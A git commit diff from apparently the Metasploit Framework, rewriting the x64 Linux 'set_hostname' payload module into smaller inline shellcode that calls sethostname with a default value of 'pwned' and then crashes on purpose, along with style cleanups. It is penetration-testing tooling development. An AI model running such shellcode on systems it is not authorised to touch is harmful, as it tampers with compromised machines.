Merge pull request #1 from msutovsky-r7/collab/payload/set_hostname_linux_x64

xHector1337 · web-flow · commit 4e27e2fa185f · 2025-07-04T13:37:28.000+03:00
Rewrites shellcode to smaller size, rubocopes
diff --git a/modules/payloads/singles/linux/x64/set_hostname.rb b/modules/payloads/singles/linux/x64/set_hostname.rb
@@ -3,55 +3,59 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-module MetasploitModule 
+module MetasploitModule
+  CachedSize = 33
 
-  CachedSize = 28
-  
   include Msf::Payload::Single
   include Msf::Payload::Linux
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'        => 'Linux Set Hostname',
-      'Description' => 'Sets the hostname of the machine.',
-      'Author'      => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
-      'License'     => MSF_LICENSE,
-      'Platform'    => 'linux',
-      'Arch'        => ARCH_X64,
-      'Privileged'  => true
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'Linux Set Hostname',
+        'Description' => 'Sets the hostname of the machine.',
+        'Author' => 'Muzaffer Umut ŞAHİN <mailatmayinlutfen@gmail.com>',
+        'License' => MSF_LICENSE,
+        'Platform' => 'linux',
+        'Arch' => ARCH_X64,
+        'Privileged' => true
+      )
+    )
 
     register_options(
       [
-        OptString.new('HOSTNAME', [true, 'The hostname to set.','pwned'])
-      ])
+        OptString.new('HOSTNAME', [true, 'The hostname to set.', 'pwned'])
+      ]
+    )
   end
 
   def generate(_opts = {})
     hostname = (datastore['HOSTNAME'] || 'pwned').gsub(/\s+/, '') # remove all whitespace from hostname.
     length = hostname.length
     if length > 0xff
-      fail_with(Msf::Module::Failure::BadConfig, "HOSTNAME must be less than 255 characters.")
+      fail_with(Msf::Module::Failure::BadConfig, 'HOSTNAME must be less than 255 characters.')
     end
 
-    payload = %Q^
-      xor rax, rax
-      xor rsi, rsi
-      push rax    ; push the null byte of the hostname string to stack.
-      mov al, 170 ; sethostname() syscall number.
+    payload = %^
+      push 0xffffffffffffff56 ; sethostname() syscall number.
+      pop rax
+      neg rax
       jmp str
 
     end:
-      mov sil, #{length}
+      push #{length}
+      pop rsi
       pop rdi    ; rdi points to the hostname string.
+      xor byte [rdi+rsi], 0x41
       syscall
       ret        ; break the loop by causing segfault.
 
     str:
       call end
-      db "#{hostname}"
+      db "#{hostname}A"
     ^
 
-    Metasm::Shellcode.assemble(Metasm::X64.new,payload).encode_string
+    Metasm::Shellcode.assemble(Metasm::X64.new, payload).encode_string
   end
-end
+end
